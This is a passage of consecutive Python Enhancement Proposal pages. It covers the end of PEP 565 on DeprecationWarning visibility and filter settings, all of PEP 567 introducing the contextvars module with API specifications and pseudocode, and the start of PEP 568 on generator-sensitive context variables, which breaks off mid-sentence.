This means that tool developers that create an installable or executable
artifact (such as a zipapp archive) for distribution to their users
shouldn’t see any change from the status quo, while users of more ad hoc
personal or locally distributed scripts are likely to start seeing relevant
deprecation warnings again (as they did in Python 2.6 and earlier).
Additional use case for FutureWarning
The standard library documentation will be updated to explicitly recommend the
use of FutureWarning (rather than DeprecationWarning) for backwards
compatibility warnings that are intended to be seen by users of an
application. (This will be in addition to the existing use of FutureWarning
to warn about constructs that will remain valid code in the future,
but will have different semantics).
This will give the following three distinct categories of backwards
compatibility warning, with three different intended audiences:
PendingDeprecationWarning: hidden by default for all code.
The intended audience is Python developers that take an active interest in
ensuring the future compatibility of their software (e.g. professional
Python application developers with specific support obligations).
DeprecationWarning: reported by default for code that runs directly in
the __main__ module (as such code is considered relatively unlikely to
have a dedicated test suite), but hidden by default for code in other modules.
The intended audience is Python developers that are at risk of upgrades to
their dependencies (including upgrades to Python itself) breaking their
software (e.g. developers using Python to script environments where someone
else is in control of the timing of dependency upgrades).
FutureWarning: reported by default for all code.
The intended audience is users of applications written in Python, rather than
other Python developers (e.g. warning about use of a deprecated setting in a
configuration file format).
For library and framework authors that want to ensure their API compatibility
warnings are more reliably seen by their users, the recommendation is to use a
custom warning class that derives from DeprecationWarning in Python 3.7+,
and from FutureWarning in earlier versions.
Recommended filter settings for test runners
Developers of test runners are advised to implement logic equivalent to the
following when determining their default warnings filters:
if not sys.warnoptions:
warnings.simplefilter("default")
This effectively enables all warnings by default, as if the -Wd command
line option had been passed.
Note that actually enabling BytesWarning in a test suite still requires
passing the -b option to the interpreter at the command line. For implicit
bytes conversion and bytes comparison warnings, the warnings filter machinery
is only used to determine whether they should be printed as warnings or raised
as exceptions - when the command line flag isn’t set, the interpreter doesn’t
even emit the warning in the first place.
Recommended filter settings for interactive shells
Developers of interactive shells are advised to add a filter that enables
DeprecationWarning in the namespace where user code is entered and executed.
If that namespace is __main__ (as it is for the default CPython REPL), then
no changes are needed beyond those in this PEP.
Interactive shell implementations which use a namespace other than
__main__ will need to add their own filter. For example, IPython uses the
following command ([6]) to set up a suitable filter:
warnings.filterwarnings("default", category=DeprecationWarning,
module=self.user_ns.get("__name__"))
Other documentation updates
The current reference documentation for the warnings system is relatively short
on specific examples of possible settings for the -W command line option
or the PYTHONWARNINGS environment variably that achieve particular end
results.
The following improvements are proposed as part of the implementation of this
PEP:
Explicitly list the following entries under the description of the
PYTHONWARNINGS environment variable:PYTHONWARNINGS=error # Convert to exceptions
PYTHONWARNINGS=always # Warn every time
PYTHONWARNINGS=default # Warn once per call location
PYTHONWARNINGS=module # Warn once per calling module
PYTHONWARNINGS=once # Warn once per Python process
PYTHONWARNINGS=ignore # Never warn
Explicitly list the corresponding short options
(-We, -Wa, -Wd, -Wm, -Wo, -Wi) for each of the
warning actions listed under the -W command line switch documentation
Explicitly list the default filter set in the warnings module
documentation, using the action::category and action::category:module
notation
Explicitly list the following snippet in the warnings.simplefilter
documentation as a recommended approach to turning off all warnings by
default in a Python application while still allowing them to be turned
back on via PYTHONWARNINGS or the -W command line switch:if not sys.warnoptions:
warnings.simplefilter("ignore")
None of these are new (they already work in all still supported Python
versions), but they’re not especially obvious given the current structure
of the related documentation.
Reference Implementation
A reference implementation is available in the PR [4] linked from the
related tracker issue for this PEP [5].
As a side-effect of implementing this PEP, the internal warnings filter list
will start allowing the use of plain strings as part of filter definitions (in
addition to the existing use of compiled regular expressions). When present,
the plain strings will be compared for exact matches only. This approach allows
the new default filter to be added during interpreter startup without requiring
early access to the re module.
Motivation
As discussed in [1] and mentioned in [2], Python 2.7 and Python 3.2 changed
the default handling of DeprecationWarning such that:
the warning was hidden by default during normal code execution
the unittest test runner was updated to re-enable it when running tests
The intent was to avoid cases of tooling output like the following:
$ devtool mycode/
/usr/lib/python3.6/site-packages/devtool/cli.py:1: DeprecationWarning: 'async' and 'await' will become reserved keywords in Python 3.7
async = True
... actual tool output ...
Even when devtool is a tool specifically for Python programmers, this is not
a particularly useful warning, as it will be shown on every invocation, even
though the main helpful step an end user can take is to report a bug to the
developers of devtool.
The warning is even less helpful for general purpose developer tools that are
used across more languages than just Python, and almost entirely *un*helpful
for applications that simply happen to be written in Python, and aren’t
necessarily intended for a developer audience at all.
However, this change proved to have unintended consequences for the following
audiences:
anyone using a test runner other than the default one built into unittest
(the request for third party test runners to change their default warnings
filters was never made explicitly, so many of them still rely on the
interpreter defaults that are designed to suit deployed applications)
anyone using the default unittest test runner to test their Python code
in a subprocess (since even unittest only adjusts the warnings settings
in the current process)
anyone writing Python code at the interactive prompt or as part of a directly
executed script that didn’t have a Python level test suite at all
In these cases, DeprecationWarning ended up become almost entirely
equivalent to PendingDeprecationWarning: it was simply never seen at all.
Limitations on PEP Scope
This PEP exists specifically to explain both the proposed addition to the
default warnings filter for 3.7, and to more clearly articulate the rationale
for the original change to the handling of DeprecationWarning back in Python 2.7
and 3.2.
This PEP does not solve all known problems with the current approach to handling
deprecation warnings. Most notably:
The default unittest test runner does not currently report deprecation
warnings emitted at module import time, as the warnings filter override is only
put in place during test execution, not during test discovery and loading.
The default unittest test runner does not currently report deprecation
warnings in subprocesses, as the warnings filter override is applied directly
to the loaded warnings module, not to the PYTHONWARNINGS environment
variable.
The standard library doesn’t provide a straightforward way to opt-in to seeing
all warnings emitted by a particular dependency prior to upgrading it
(the third-party warn module [3] does provide this, but enabling it
involves monkeypatching the standard library’s warnings module).
When software has been factored out into support modules, but those modules
have little or no automated test coverage, re-enabling deprecation warnings
by default in __main__ isn’t likely to help find API compatibility
problems. Near term, the best currently available answer is to run affected
applications with PYTHONWARNINGS=default::DeprecationWarning or
python -W default::DeprecationWarning and pay attention to their
stderr output. Longer term, this is really a question for researchers
working on static analysis of Python code: how to reliably find usage of
deprecated APIs, and how to infer that an API or parameter is deprecated
based on warnings.warn calls, without actually running either the code
providing the API or the code accessing it.
While these are real problems with the status quo, they’re excluded from
consideration in this PEP because they’re going to require more complex
solutions than a single additional entry in the default warnings filter,
and resolving them at least potentially won’t require going through the PEP
process.
For anyone interested in pursuing them further, the first two would be
unittest module enhancement requests, the third would be a warnings
module enhancement request, while the last would only require a PEP if
inferring API deprecations from their contents was deemed to be an intractable
code analysis problem, and an explicit function and parameter marker syntax in
annotations was proposed instead.
The CPython reference implementation will also include the following related
changes in 3.7:
a new -X dev command line option that combines several developer centric
settings (including -Wd) into one command line flag:
https://github.com/python/cpython/issues/76224
changing the behaviour in debug builds to show more of the warnings that are
off by default in regular interpreter builds: https://github.com/python/cpython/issues/76269
Independently of the proposed changes to the default filters in this PEP,
issue 32229 [7] is a proposal to add a warnings.hide_warnings API to
make it simpler for application developers to hide warnings during normal
operation, while easily making them visible when testing.
References
[1]
stdlib-sig thread proposing the original default filter change
(https://mail.python.org/pipermail/stdlib-sig/2009-November/000789.html)
[2]
Python 2.7 notification of the default warnings filter change
(https://docs.python.org/3/whatsnew/2.7.html#changes-to-the-handling-of-deprecation-warnings)
[3]
Emitting warnings based on the location of the warning itself
(https://pypi.org/project/warn/)
[4]
GitHub PR for PEP 565 implementation
(https://github.com/python/cpython/pull/4458)
[5]
Tracker issue for PEP 565 implementation
(https://github.com/python/cpython/issues/76156)
[6]
IPython’s DeprecationWarning auto-configuration
(https://github.com/ipython/ipython/blob/6.2.x/IPython/core/interactiveshell.py#L619)
[7]
warnings.hide_warnings API proposal
(https://github.com/python/cpython/issues/76410)
First python-dev discussion thread
Second python-dev discussion thread
Copyright
This document has been placed in the public domain.
| Final | PEP 565 – Show DeprecationWarning in __main__ | Standards Track | In Python 2.7 and Python 3.2, the default warning filters were updated to hide
DeprecationWarning by default, such that deprecation warnings in development
tools that were themselves written in Python (e.g. linters, static analysers,
test runners, code generators), as well as any other applications that merely
happened to be written in Python, wouldn’t be visible to their users unless
those users explicitly opted in to seeing them. |
PEP 567 – Context Variables
Author:
Yury Selivanov <yury at edgedb.com>
Status:
Final
Type:
Standards Track
Created:
12-Dec-2017
Python-Version:
3.7
Post-History:
12-Dec-2017, 28-Dec-2017, 16-Jan-2018
Table of Contents
Abstract
API Design and Implementation Revisions
Rationale
Introduction
Specification
contextvars.ContextVar
contextvars.Token
contextvars.Context
asyncio
Implementation
Summary of the New APIs
Python API
C API
Rejected Ideas
Replicating threading.local() interface
Replacing Token with ContextVar.unset()
Having Token.reset() instead of ContextVar.reset()
Making Context objects picklable
Making Context a MutableMapping
Having initial values for ContextVars
Backwards Compatibility
Examples
Converting code that uses threading.local()
Offloading execution to other threads
Reference Implementation
Acceptance
References
Acknowledgments
Copyright
Abstract
This PEP proposes a new contextvars module and a set of new
CPython C APIs to support context variables. This concept is
similar to thread-local storage (TLS), but, unlike TLS, it also allows
correctly keeping track of values per asynchronous task, e.g.
asyncio.Task.
This proposal is a simplified version of PEP 550. The key
difference is that this PEP is concerned only with solving the case
for asynchronous tasks, not for generators. There are no proposed
modifications to any built-in types or to the interpreter.
This proposal is not strictly related to Python Context Managers.
Although it does provide a mechanism that can be used by Context
Managers to store their state.
API Design and Implementation Revisions
In Python 3.7.1 the signatures of all context variables
C APIs were changed to use PyObject * pointers instead
of PyContext *, PyContextVar *, and PyContextToken *,
e.g.:
// in 3.7.0:
PyContext *PyContext_New(void);
// in 3.7.1+:
PyObject *PyContext_New(void);
See [6] for more details. The C API section of this PEP was
updated to reflect the change.
Rationale
Thread-local variables are insufficient for asynchronous tasks that
execute concurrently in the same OS thread. Any context manager that
saves and restores a context value using threading.local() will
have its context values bleed to other code unexpectedly when used
in async/await code.
A few examples where having a working context local storage for
asynchronous code is desirable:
Context managers like decimal contexts and numpy.errstate.
Request-related data, such as security tokens and request
data in web applications, language context for gettext, etc.
Profiling, tracing, and logging in large code bases.
Introduction
The PEP proposes a new mechanism for managing context variables.
The key classes involved in this mechanism are contextvars.Context
and contextvars.ContextVar. The PEP also proposes some policies
for using the mechanism around asynchronous tasks.
The proposed mechanism for accessing context variables uses the
ContextVar class. A module (such as decimal) that wishes to
use the new mechanism should:
declare a module-global variable holding a ContextVar to
serve as a key;
access the current value via the get() method on the
key variable;
modify the current value via the set() method on the
key variable.
The notion of “current value” deserves special consideration:
different asynchronous tasks that exist and execute concurrently
may have different values for the same key. This idea is well known
from thread-local storage but in this case the locality of the value is
not necessarily bound to a thread. Instead, there is the notion of the
“current Context” which is stored in thread-local storage.
Manipulation of the current context is the responsibility of the
task framework, e.g. asyncio.
A Context is a mapping of ContextVar objects to their values.
The Context itself exposes the abc.Mapping interface
(not abc.MutableMapping!), so it cannot be modified directly.
To set a new value for a context variable in a Context object,
the user needs to:
make the Context object “current” using the Context.run()
method;
use ContextVar.set() to set a new value for the context
variable.
The ContextVar.get() method looks for the variable in the current
Context object using self as a key.
It is not possible to get a direct reference to the current Context
object, but it is possible to obtain a shallow copy of it using the
contextvars.copy_context() function. This ensures that the
caller of Context.run() is the sole owner of its Context
object.
Specification
A new standard library module contextvars is added with the
following APIs:
The copy_context() -> Context function is used to get a copy of
the current Context object for the current OS thread.
The ContextVar class to declare and access context variables.
The Context class encapsulates context state. Every OS thread
stores a reference to its current Context instance.
It is not possible to control that reference directly.
Instead, the Context.run(callable, *args, **kwargs) method is
used to run Python code in another context.
contextvars.ContextVar
The ContextVar class has the following constructor signature:
ContextVar(name, *, default=_NO_DEFAULT). The name parameter
is used for introspection and debug purposes, and is exposed
as a read-only ContextVar.name attribute. The default
parameter is optional. Example:
# Declare a context variable 'var' with the default value 42.
var = ContextVar('var', default=42)
(The _NO_DEFAULT is an internal sentinel object used to
detect if the default value was provided.)
ContextVar.get(default=_NO_DEFAULT) returns a value for
the context variable for the current Context:
# Get the value of `var`.
var.get()
If there is no value for the variable in the current context,
ContextVar.get() will:
return the value of the default argument of the get() method,
if provided; or
return the default value for the context variable, if provided; or
raise a LookupError.
ContextVar.set(value) -> Token is used to set a new value for
the context variable in the current Context:
# Set the variable 'var' to 1 in the current context.
var.set(1)
ContextVar.reset(token) is used to reset the variable in the
current context to the value it had before the set() operation
that created the token (or to remove the variable if it was
not set):
# Assume: var.get(None) is None
# Set 'var' to 1:
token = var.set(1)
try:
# var.get() == 1
finally:
var.reset(token)
# After reset: var.get(None) is None,
# i.e. 'var' was removed from the current context.
The ContextVar.reset() method raises:
a ValueError if it is called with a token object created
by another variable;
a ValueError if the current Context object does not match
the one where the token object was created;
a RuntimeError if the token object has already been used once
to reset the variable.
contextvars.Token
contextvars.Token is an opaque object that should be used to
restore the ContextVar to its previous value, or to remove it from
the context if the variable was not set before. It can be created
only by calling ContextVar.set().
For debug and introspection purposes it has:
a read-only attribute Token.var pointing to the variable
that created the token;
a read-only attribute Token.old_value set to the value the
variable had before the set() call, or to Token.MISSING
if the variable wasn’t set before.
contextvars.Context
Context object is a mapping of context variables to values.
Context() creates an empty context. To get a copy of the current
Context for the current OS thread, use the
contextvars.copy_context() method:
ctx = contextvars.copy_context()
To run Python code in some Context, use Context.run()
method:
ctx.run(function)
Any changes to any context variables that function causes will
be contained in the ctx context:
var = ContextVar('var')
var.set('spam')
def main():
# 'var' was set to 'spam' before
# calling 'copy_context()' and 'ctx.run(main)', so:
# var.get() == ctx[var] == 'spam'
var.set('ham')
# Now, after setting 'var' to 'ham':
# var.get() == ctx[var] == 'ham'
ctx = copy_context()
# Any changes that the 'main' function makes to 'var'
# will be contained in 'ctx'.
ctx.run(main)
# The 'main()' function was run in the 'ctx' context,
# so changes to 'var' are contained in it:
# ctx[var] == 'ham'
# However, outside of 'ctx', 'var' is still set to 'spam':
# var.get() == 'spam'
Context.run() raises a RuntimeError when called on the same
context object from more than one OS thread, or when called
recursively.
Context.copy() returns a shallow copy of the context object.
Context objects implement the collections.abc.Mapping ABC.
This can be used to introspect contexts:
ctx = contextvars.copy_context()
# Print all context variables and their values in 'ctx':
print(ctx.items())
# Print the value of 'some_variable' in context 'ctx':
print(ctx[some_variable])
Note that all Mapping methods, including Context.__getitem__ and
Context.get, ignore default values for context variables
(i.e. ContextVar.default). This means that for a variable var
that was created with a default value and was not set in the
context:
context[var] raises a KeyError,
var in context returns False,
the variable isn’t included in context.items(), etc.
asyncio
asyncio uses Loop.call_soon(), Loop.call_later(),
and Loop.call_at() to schedule the asynchronous execution of a
function. asyncio.Task uses call_soon() to run the
wrapped coroutine.
We modify Loop.call_{at,later,soon} and
Future.add_done_callback() to accept the new optional context
keyword-only argument, which defaults to the current context:
def call_soon(self, callback, *args, context=None):
if context is None:
context = contextvars.copy_context()
# ... some time later
context.run(callback, *args)
Tasks in asyncio need to maintain their own context that they inherit
from the point they were created at. asyncio.Task is modified
as follows:
class Task:
def __init__(self, coro):
...
# Get the current context snapshot.
self._context = contextvars.copy_context()
self._loop.call_soon(self._step, context=self._context)
def _step(self, exc=None):
...
# Every advance of the wrapped coroutine is done in
# the task's context.
self._loop.call_soon(self._step, context=self._context)
...
Implementation
This section explains high-level implementation details in
pseudo-code. Some optimizations are omitted to keep this section
short and clear.
The Context mapping is implemented using an immutable dictionary.
This allows for a O(1) implementation of the copy_context()
function. The reference implementation implements the immutable
dictionary using Hash Array Mapped Tries (HAMT); see PEP 550
for analysis of HAMT performance [1].
For the purposes of this section, we implement an immutable dictionary
using a copy-on-write approach and the built-in dict type:
class _ContextData:
def __init__(self):
self._mapping = dict()
def __getitem__(self, key):
return self._mapping[key]
def __contains__(self, key):
return key in self._mapping
def __len__(self):
return len(self._mapping)
def __iter__(self):
return iter(self._mapping)
def set(self, key, value):
copy = _ContextData()
copy._mapping = self._mapping.copy()
copy._mapping[key] = value
return copy
def delete(self, key):
copy = _ContextData()
copy._mapping = self._mapping.copy()
del copy._mapping[key]
return copy
Every OS thread has a reference to the current Context object:
class PyThreadState:
context: Context
contextvars.Context is a wrapper around _ContextData:
class Context(collections.abc.Mapping):
_data: _ContextData
_prev_context: Optional[Context]
def __init__(self):
self._data = _ContextData()
self._prev_context = None
def run(self, callable, *args, **kwargs):
if self._prev_context is not None:
raise RuntimeError(
f'cannot enter context: {self} is already entered')
ts: PyThreadState = PyThreadState_Get()
self._prev_context = ts.context
try:
ts.context = self
return callable(*args, **kwargs)
finally:
ts.context = self._prev_context
self._prev_context = None
def copy(self):
new = Context()
new._data = self._data
return new
# Implement abstract Mapping.__getitem__
def __getitem__(self, var):
return self._data[var]
# Implement abstract Mapping.__contains__
def __contains__(self, var):
return var in self._data
# Implement abstract Mapping.__len__
def __len__(self):
return len(self._data)
# Implement abstract Mapping.__iter__
def __iter__(self):
return iter(self._data)
# The rest of the Mapping methods are implemented
# by collections.abc.Mapping.
contextvars.copy_context() is implemented as follows:
def copy_context():
ts: PyThreadState = PyThreadState_Get()
return ts.context.copy()
contextvars.ContextVar interacts with PyThreadState.context
directly:
class ContextVar:
def __init__(self, name, *, default=_NO_DEFAULT):
self._name = name
self._default = default
@property
def name(self):
return self._name
def get(self, default=_NO_DEFAULT):
ts: PyThreadState = PyThreadState_Get()
try:
return ts.context[self]
except KeyError:
pass
if default is not _NO_DEFAULT:
return default
if self._default is not _NO_DEFAULT:
return self._default
raise LookupError
def set(self, value):
ts: PyThreadState = PyThreadState_Get()
data: _ContextData = ts.context._data
try:
old_value = data[self]
except KeyError:
old_value = Token.MISSING
updated_data = data.set(self, value)
ts.context._data = updated_data
return Token(ts.context, self, old_value)
def reset(self, token):
if token._used:
raise RuntimeError("Token has already been used once")
if token._var is not self:
raise ValueError(
"Token was created by a different ContextVar")
ts: PyThreadState = PyThreadState_Get()
if token._context is not ts.context:
raise ValueError(
"Token was created in a different Context")
if token._old_value is Token.MISSING:
ts.context._data = ts.context._data.delete(token._var)
else:
ts.context._data = ts.context._data.set(token._var,
token._old_value)
token._used = True
Note that the in the reference implementation, ContextVar.get()
has an internal cache for the most recent value, which allows to
bypass a hash lookup. This is similar to the optimization the
decimal module implements to retrieve its context from
PyThreadState_GetDict(). See PEP 550 which explains the
implementation of the cache in great detail.
The Token class is implemented as follows:
class Token:
MISSING = object()
def __init__(self, context, var, old_value):
self._context = context
self._var = var
self._old_value = old_value
self._used = False
@property
def var(self):
return self._var
@property
def old_value(self):
return self._old_value
Summary of the New APIs
Python API
A new contextvars module with ContextVar, Context,
and Token classes, and a copy_context() function.
asyncio.Loop.call_at(), asyncio.Loop.call_later(),
asyncio.Loop.call_soon(), and
asyncio.Future.add_done_callback() run callback functions in
the context they were called in. A new context keyword-only
parameter can be used to specify a custom context.
asyncio.Task is modified internally to maintain its own
context.
C API
PyObject * PyContextVar_New(char *name, PyObject *default):
create a ContextVar object. The default argument can be
NULL, which means that the variable has no default value.
int PyContextVar_Get(PyObject *, PyObject *default_value, PyObject **value):
return -1 if an error occurs during the lookup, 0 otherwise.
If a value for the context variable is found, it will be set to the
value pointer. Otherwise, value will be set to
default_value when it is not NULL. If default_value is
NULL, value will be set to the default value of the
variable, which can be NULL too. value is always a new
reference.
PyObject * PyContextVar_Set(PyObject *, PyObject *):
set the value of the variable in the current context.
PyContextVar_Reset(PyObject *, PyObject *):
reset the value of the context variable.
PyObject * PyContext_New(): create a new empty context.
PyObject * PyContext_Copy(PyObject *): return a shallow
copy of the passed context object.
PyObject * PyContext_CopyCurrent(): get a copy of the current
context.
int PyContext_Enter(PyObject *) and
int PyContext_Exit(PyObject *) allow to set and restore
the context for the current OS thread. It is required to always
restore the previous context:PyObject *old_ctx = PyContext_Copy();
if (old_ctx == NULL) goto error;
if (PyContext_Enter(new_ctx)) goto error;
// run some code
if (PyContext_Exit(old_ctx)) goto error;
Rejected Ideas
Replicating threading.local() interface
Please refer to PEP 550 where this topic is covered in detail: [2].
Replacing Token with ContextVar.unset()
The Token API allows to get around having a ContextVar.unset()
method, which is incompatible with chained contexts design of
PEP 550. Future compatibility with PEP 550 is desired
in case there is demand to support context variables in generators
and asynchronous generators.
The Token API also offers better usability: the user does not have
to special-case absence of a value. Compare:
token = cv.set(new_value)
try:
# cv.get() is new_value
finally:
cv.reset(token)
with:
_deleted = object()
old = cv.get(default=_deleted)
try:
cv.set(blah)
# code
finally:
if old is _deleted:
cv.unset()
else:
cv.set(old)
Having Token.reset() instead of ContextVar.reset()
Nathaniel Smith suggested to implement the ContextVar.reset()
method directly on the Token class, so instead of:
token = var.set(value)
# ...
var.reset(token)
we would write:
token = var.set(value)
# ...
token.reset()
Having Token.reset() would make it impossible for a user to
attempt to reset a variable with a token object created by another
variable.
This proposal was rejected for the reason of ContextVar.reset()
being clearer to the human reader of the code which variable is
being reset.
Making Context objects picklable
Proposed by Antoine Pitrou, this could enable transparent
cross-process use of Context objects, so the
Offloading execution to other threads example would work with
a ProcessPoolExecutor too.
Enabling this is problematic because of the following reasons:
ContextVar objects do not have __module__ and
__qualname__ attributes, making straightforward pickling
of Context objects impossible. This is solvable by modifying
the API to either auto detect the module where a context variable
is defined, or by adding a new keyword-only “module” parameter
to ContextVar constructor.
Not all context variables refer to picklable objects. Making a
ContextVar picklable must be an opt-in.
Given the time frame of the Python 3.7 release schedule it was decided
to defer this proposal to Python 3.8.
Making Context a MutableMapping
Making the Context class implement the abc.MutableMapping
interface would mean that it is possible to set and unset variables
using Context[var] = value and del Context[var] operations.
This proposal was deferred to Python 3.8+ because of the following:
If in Python 3.8 it is decided that generators should support
context variables (see PEP 550 and PEP 568), then Context
would be transformed into a chain-map of context variables mappings
(as every generator would have its own mapping). That would make
mutation operations like Context.__delitem__ confusing, as
they would operate only on the topmost mapping of the chain.
Having a single way of mutating the context
(ContextVar.set() and ContextVar.reset() methods) makes
the API more straightforward.For example, it would be non-obvious why the below code fragment
does not work as expected:
var = ContextVar('var')
ctx = copy_context()
ctx[var] = 'value'
print(ctx[var]) # Prints 'value'
print(var.get()) # Raises a LookupError
While the following code would work:
ctx = copy_context()
def func():
ctx[var] = 'value'
# Contrary to the previous example, this would work
# because 'func()' is running within 'ctx'.
print(ctx[var])
print(var.get())
ctx.run(func)
If Context was mutable it would mean that context variables
could be mutated separately (or concurrently) from the code that
runs within the context. That would be similar to obtaining a
reference to a running Python frame object and modifying its
f_locals from another OS thread. Having one single way to
assign values to context variables makes contexts conceptually
simpler and more predictable, while keeping the door open for
future performance optimizations.
Having initial values for ContextVars
Nathaniel Smith proposed to have a required initial_value
keyword-only argument for the ContextVar constructor.
The main argument against this proposal is that for some types
there is simply no sensible “initial value” except None.
E.g. consider a web framework that stores the current HTTP
request object in a context variable. With the current semantics
it is possible to create a context variable without a default value:
# Framework:
current_request: ContextVar[Request] = \
ContextVar('current_request')
# Later, while handling an HTTP request:
request: Request = current_request.get()
# Work with the 'request' object:
return request.method
Note that in the above example there is no need to check if
request is None. It is simply expected that the framework
always sets the current_request variable, or it is a bug (in
which case current_request.get() would raise a LookupError).
If, however, we had a required initial value, we would have
to guard against None values explicitly:
# Framework:
current_request: ContextVar[Optional[Request]] = \
ContextVar('current_request', initial_value=None)
# Later, while handling an HTTP request:
request: Optional[Request] = current_request.get()
# Check if the current request object was set:
if request is None:
raise RuntimeError
# Work with the 'request' object:
return request.method
Moreover, we can loosely compare context variables to regular
Python variables and to threading.local() objects. Both
of them raise errors on failed lookups (NameError and
AttributeError respectively).
Backwards Compatibility
This proposal preserves 100% backwards compatibility.
Libraries that use threading.local() to store context-related
values, currently work correctly only for synchronous code. Switching
them to use the proposed API will keep their behavior for synchronous
code unmodified, but will automatically enable support for
asynchronous code.
Examples
Converting code that uses threading.local()
A typical code fragment that uses threading.local() usually
looks like the following:
class PrecisionStorage(threading.local):
# Subclass threading.local to specify a default value.
value = 0.0
precision = PrecisionStorage()
# To set a new precision:
precision.value = 0.5
# To read the current precision:
print(precision.value)
Such code can be converted to use the contextvars module:
precision = contextvars.ContextVar('precision', default=0.0)
# To set a new precision:
precision.set(0.5)
# To read the current precision:
print(precision.get())
Offloading execution to other threads
It is possible to run code in a separate OS thread using a copy
of the current thread context:
executor = ThreadPoolExecutor()
current_context = contextvars.copy_context()
executor.submit(current_context.run, some_function)
Reference Implementation
The reference implementation can be found here: [3].
See also issue 32436 [4].
Acceptance
PEP 567 was accepted by Guido on Monday, January 22, 2018 [5].
The reference implementation was merged on the same day.
References
[1]
PEP 550
[2]
PEP 550
[3]
https://github.com/python/cpython/pull/5027
[4]
https://bugs.python.org/issue32436
[5]
https://mail.python.org/pipermail/python-dev/2018-January/151878.html
[6]
https://bugs.python.org/issue34762
Acknowledgments
I thank Guido van Rossum, Nathaniel Smith, Victor Stinner,
Elvis Pranskevichus, Alyssa Coghlan, Antoine Pitrou, INADA Naoki,
Paul Moore, Eric Snow, Greg Ewing, and many others for their feedback,
ideas, edits, criticism, code reviews, and discussions around
this PEP.
Copyright
This document has been placed in the public domain.
| Final | PEP 567 – Context Variables | Standards Track | This PEP proposes a new contextvars module and a set of new
CPython C APIs to support context variables. This concept is
similar to thread-local storage (TLS), but, unlike TLS, it also allows
correctly keeping track of values per asynchronous task, e.g.
asyncio.Task. |
PEP 568 – Generator-sensitivity for Context Variables
Author:
Nathaniel J. Smith <njs at pobox.com>
Status:
Deferred
Type:
Standards Track
Created:
04-Jan-2018
Python-Version:
3.8
Post-History:
Table of Contents
Abstract
Rationale
High-level summary
Specification
Review of PEP 567
Changes from PEP 567 to this PEP
Comparison to PEP 550
Implementation notes
Copyright
Abstract
Context variables provide a generic mechanism for tracking dynamic,
context-local state, similar to thread-local storage but generalized
to cope work with other kinds of thread-like contexts, such as asyncio
Tasks. PEP 550 proposed a mechanism for context-local state that was
also sensitive to generator context, but this was pretty complicated,
so the BDFL requested it be simplified. The result was PEP 567, which
is targeted for inclusion in 3.7. This PEP then extends PEP 567’s
machinery to add generator context sensitivity.
This PEP is starting out in the “deferred” status, because there isn’t
enough time to give it proper consideration before the 3.7 feature
freeze. The only goal right now is to understand what would be
required to add generator context sensitivity in 3.8, so that we can
avoid shipping something in 3.7 that would rule it out by accident.
(Ruling it out on purpose can wait until 3.8 ;-).)
Rationale
[Currently the point of this PEP is just to understand how this
would work, with discussion of whether it’s a good idea deferred
until after the 3.7 feature freeze. So rationale is TBD.]
High-level summary
Instead of holding a single Context, the threadstate now holds a
ChainMap of Contexts. ContextVar.get and
ContextVar.set are backed by the ChainMap. Generators and
async generators each have an associated Context that they push
onto the ChainMap while they’re running to isolate their
context-local changes from their callers, though this can be
overridden in cases like @contextlib.contextmanager where
“leaking” context changes from the generator into its caller is
desirable.
Specification
Review of PEP 567
Let’s start by reviewing how PEP 567 works, and then in the next
section we’ll describe the differences.
In PEP 567, a Context is a Mapping from ContextVar objects
to arbitrary values. In our pseudo-code here we’ll pretend that it
uses a dict for backing storage. (The real implementation uses a
HAMT, which is semantically equivalent to a dict but with
different performance trade-offs.):
class Context(collections.abc.Mapping):
def __init__(self):
self._data = {}
self._in_use = False
def __getitem__(self, key):
return self._data[key]
def __iter__(self):
return iter(self._data)
def __len__(self):
return len(self._data)
At any given moment, the threadstate holds a current Context
(initialized to an empty Context when the threadstate is created);
we can use Context.run to temporarily switch the current
Context:
# Context.run
def run(self, fn, *args, **kwargs):
if self._in_use:
raise RuntimeError("Context already in use")
tstate = get_thread_state()
old_context = tstate.current_context
tstate.current_context = self
self._in_use = True
try:
return fn(*args, **kwargs)
finally:
state.current_context = old_context
self._in_use = False
We can fetch a shallow copy of the current Context by calling
copy_context; this is commonly used when spawning a new task, so
that the child task can inherit context from its parent:
def copy_context():
tstate = get_thread_state()
new_context = Context()
new_context._data = dict(tstate.current_context)
return new_context
In practice, what end users generally work with is ContextVar
objects, which also provide the only way to mutate a Context. They
work with a utility class Token, which can be used to restore a
ContextVar to its previous value:
class Token:
MISSING = sentinel_value()
# Note: constructor is private
def __init__(self, context, var, old_value):
self._context = context
self.var = var
self.old_value = old_value
# XX: PEP 567 currently makes this a method on ContextVar, but
# I'm going to propose it switch to this API because it's simpler.
def reset(self):
# XX: should we allow token reuse?
# XX: should we allow tokens to be used if the saved
# context is no longer active?
if self.old_value is self.MISSING:
del self._context._data[self.context_var]
else:
self._context._data[self.context_var] = self.old_value
# XX: the handling of defaults here uses the simplified proposal from
# https://mail.python.org/pipermail/python-dev/2018-January/151596.html
# This can be updated to whatever we settle on, it was just less
# typing this way :-)
class ContextVar:
def __init__(self, name, *, default=None):
self.name = name
self.default = default
def get(self):
context = get_thread_state().current_context
return context.get(self, self.default)
def set(self, new_value):
context = get_thread_state().current_context
token = Token(context, self, context.get(self, Token.MISSING))
context._data[self] = new_value
return token
Changes from PEP 567 to this PEP
In general, Context remains the same. However, now instead of
holding a single Context object, the threadstate stores a stack of
them. This stack acts just like a collections.ChainMap, so we’ll
use that in our pseudocode. Context.run then becomes:
# Context.run
def run(self, fn, *args, **kwargs):
if self._in_use:
raise RuntimeError("Context already in use")
tstate = get_thread_state()
old_context_stack = tstate.current_context_stack
tstate.current_context_stack = ChainMap([self]) # changed
self._in_use = True
try:
return fn(*args, **kwargs)
finally:
state.current_context_stack = old_context_stack
self._in_use = False
Aside from some updated variables names (e.g.,
tstate.current_context → tstate.current_context_stack), the
only change here is on the marked line, which now wraps the context in
a ChainMap before stashing it in the threadstate.
We also add a Context.push method, which is almost exactly like
Context.run, except that it temporarily pushes the Context
onto the existing stack, instead of temporarily replacing the whole
stack:
# Context.push
def push(self, fn, *args, **kwargs):
if self._in_use:
raise RuntimeError("Context already in use")
tstate = get_thread_state()
tstate.current_context_stack.maps.insert(0, self) # different from run
self._in_use = True
try:
return fn(*args, **kwargs)
finally:
tstate.current_context_stack.maps.pop(0) # different from run
self._in_use = False
In most cases, we don’t expect push to be used directly; instead,
it will be used implicitly by generators. Specifically, every
generator object and async generator object gains a new attribute
.context. When an (async) generator object is created, this
attribute is initialized to an empty Context (self.context =
Context()). This is a mutable attribute; it can be changed by user
code. But trying to set it to anything that isn’t a Context object
or None will raise an error.
Whenever we enter an generator via __next__, send, throw,
or close, or enter an async generator by calling one of those
